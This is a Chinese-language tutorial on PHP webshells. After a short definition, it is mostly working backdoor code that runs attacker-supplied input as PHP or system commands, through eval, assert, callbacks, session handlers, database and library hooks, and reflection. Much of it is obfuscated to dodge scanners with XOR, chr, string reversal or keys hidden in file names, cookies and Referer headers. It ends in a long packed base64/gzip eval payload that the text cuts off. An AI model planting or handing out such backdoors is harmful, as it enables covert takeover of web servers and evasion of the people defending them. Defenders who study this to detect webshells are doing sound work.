关于PHP中的webshell
一、webshell简介
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
二、webshell分类
1、eval
接受一个参数,将字符串作为PHP代码执行
eval($_POST[1]);
2、assert
一般接受一个参数,php 5.4.8版本后可以接受两个参数
assert($_REQUEST[l])
3、正则匹配类
preg_replace/ mb_ereg_replace/preg_filter等
4、文件包含类
include/include_once/require/require_once/file_get_contents
5、回调函数
call_user_func
call_user_func('assert', $_REQUEST['pass']); //或者 $e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))
三、webshell变种
assert 和 eval 基本上都被用烂了,分分钟就被检查出来了,所以网上有很多种变种,可以做后门的函数一般包含以下几个关键词:1、 callable 2、mixed $options 3、callback 4、handler
下面是具体的变种,更具隐蔽性
1、无明显回调
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
2、单个参数
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);
或者
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);
或者
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));
只要指定过滤方法为回调(FILTER_CALLBACK),且option为assert即可。
3、回调函数
call_user_func('assert', $_REQUEST['pass']);
call_user_func_array('assert', array($_REQUEST['pass']));
或者
<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
// open第一个被调用,类似 类的构造函数
function open($save_path, $session_name) {
}
// close最后一个被调用,类似 类的析构函数
function close() {
}
// 得到session id后,等价于执行assert($_REQUEST[phpcms])
session_id($_REQUEST[phpcms]);
function write($id, $sess_data) {
}
function destroy($id) {
}
function gc() {
}
// 第三个参数为read read(string $sessionId)
session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
@session_start(); //会话打开的时候,自动调用回调函数
$cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>
4、数组
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e))
或者
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);
或者
$pass= "LandGrey";
array_udiff_assoc(array($_REQUEST[$pass]), array(1), "assert");
或者
$pass= "LandGrey";
$ch = explode(".","hello.ass.world.er.t");
array_intersect_ukey(array($_REQUEST[$pass] => 1), array(1), $ch[1].$ch[3].$ch[4]);
或者
$_clasc = $_REQUEST['mod'];
$arr = array($_POST['bato'] => '|.*|e',);
@array_walk_recursive($arr, $_clasc, '');
5、把部分信息放在代码以外
比如:脚本名称、header 中
$password = "LandGrey";
$key = substr(__FILE__,-5,-4);
${"LandGrey"} = $key."Land!";
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
将脚本命名为scanner.php, 硬编码脚本最后一位字符为"r",就不会被平台检测到
或者
$password = "LandGrey";
$ch = $_COOKIE["set-domain-name"];
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
Cookie: set-domain-name=ass;
或者
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
Referer: http%3a//www.target.com/ass.php
6、数据库操作与第三方库中的回调后门
$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
可以注册一个sqlite函数,使之与assert功能相同。当执行这个sql语句的时候,就等于执行了assert
$str = urlencode($_REQUEST['pass']);
$yaml = <<<EOD
greeting: !{$str} "|.+|e"
EOD;
$parsed = yaml_parse($yaml, 0, $cnt, array("!{$_REQUEST['pass']}" => 'preg_replace'));
上面是使用php_yaml
$mem = new Memcache();
$re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
$mem->connect($_REQUEST['pass'], 11211, 0);
还有php_memcached
7、反射
<?php
/**
* eva
* l($_POS
* T["c"]);
* asse
* rt
*/
class TestClass { }
$rc = new ReflectionClass('TestClass');
$str = $rc->getDocComment();
$payload = substr($str,strpos($str,'ev'),3);
$payload .= substr($str,strpos($str,'l('),7);
$payload .= substr($str,strpos($str,'T['),8);
$exe = substr($str, strpos($str, 'as'), 4);
$exe .= substr($str, strpos($str, 'rt'), 2); $exe($payload);
?>
四、隐藏关键词
1、混淆
<?php
//pwd=addimg
$sss = "ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NCcGMzTmxkQ2dnSkY5U1JWRlZSVk5VV3lkd1lYTnpKMTBnS1NsN1FHVjJZV3dvSUdKaGMyVTJORjlrWldOdlpHVW9JQ1JmVWtWUlZVVlRWRnNuY0dGemN5ZGRJQ2tnS1R0OVpXeHpaWHRBWlhaaGJDZ2dKRjlTUlZGVlJWTlVXeWRoWkdScGJXY25YU0FwTzMwPSIpKQ==";
function CheckSQL( &$val ){
$v = "select|update|union|set|where|order|and|or";
$val = base64_decode( $val );
}
CheckSQL( $sss );
preg_replace('/uploadsafe.inc.php/e','@'.$sss, 'uploadsafe.inc.php');
?>
或者
<?php
$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];
if($MMIC >1000000){
die('404');
}
if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"]))
{
$__PHP_debug = array (
'ZendName' => '70,61,73,73',
'ZendPort' => '63,68,65,63,6b',
'ZendSalt' => '792e19812fafd57c7ac150af768d95ce'
); $__PHP_replace = array (
pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),
pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),
$__PHP_debug['ZendSalt']
); $__PHP_request = &$_POST;
$__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); if ($__PHP_token == $__PHP_replace[2])
{
$__PHP_token = preg_replace (
chr(47).$__PHP_token.chr(47).chr(101),
$__PHP_request[$__PHP_replace[1]],
$__PHP_token
); unset (
$__PHP_debug,
$__PHP_replace,
$__PHP_request,
$__PHP_token
); if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); }
}
2、反引号
<?php
$cmd =base64_decode('dmVy='); // ver
echo `$cmd`. `$_GET[username]`; // ``反引号的作用相当于shell_exec,执行系统命令
//或
$var = `net user`;
echo "$var";
?>
3、XOR
<?php
@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
4、加号
<?php
$num = +"";
$num++; $num++; $num++; $num++;
$four = $num; // 4
$num++; $num++;
$six = $num; // 6
$_="";
$_[+$_]++; // +""为0
$_=$_.""; // $_为字符串"Array"
$___=$_[+""];//A
$____=$___;
$____++;//B
$_____=$____;
$_____++;//C
$______=$_____;
$______++;//D
$_______=$______;
$_______++;//E
$________=$_______;
$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;$________++;//O
$_________=$________;
$_________++;$_________++;$_________++;$_________++;//S
$_=$____.$___.$_________.$_______.$six.$four.'_'.$______.$_______.$_____.$________.$______.$_______;
$________++;$________++;$________++;//R
$_____=$_________;
$_____++;//T
$__=$___.$_________.$_________.$_______.$________.$_____;
$__($_("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(BASE64_DECODE("ZXZhbCgkX1BPU1RbY21kXSk="));
//ASSERT(eval($_POST[cmd]));
?>
5、函数
<?php
$a=@strrev(ecalper_gerp);
$b=@strrev(edoced_46esab);
echo @$a($b(L3h4L2Ug),$_POST[jc],axxa); // /xx/e
?>
6、chr
<?php
assert(chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41)); // chr解出来是assert($_POST[x]),不能替换成eval(chr(97).chr(115)
?>
7、session_set_save_handler
<?php
error_reporting(0);
if ($_REQUEST['session'] == 1) {
$session = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); //assert
// open第一个被调用,类似 类的构造函数
function open($save_path, $session_name) {
}
// close最后一个被调用,类似 类的析构函数
function close() {
}
// 得到session id后,等价于执行assert($_REQUEST[phpcms])
session_id($_REQUEST[phpcms]);
function write($id, $sess_data) {
}
function destroy($id) {
}
function gc() {
}
// 第三个参数为read read(string $sessionId)
session_set_save_handler("open", "close", $session, "write", "destroy", "gc");
@session_start(); //会话打开的时候,自动调用回调函数
$cloud = $_SESSION["d"] = "c"; // 这句话没用
}
?>
8、引号
<?php
$LMsW="p"."r"."e"."g"."_r"."epl"."a"."ce";
$LMsW("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x75\x6E\x63\x6F\x6D\x70\x72\x65\x73\x73\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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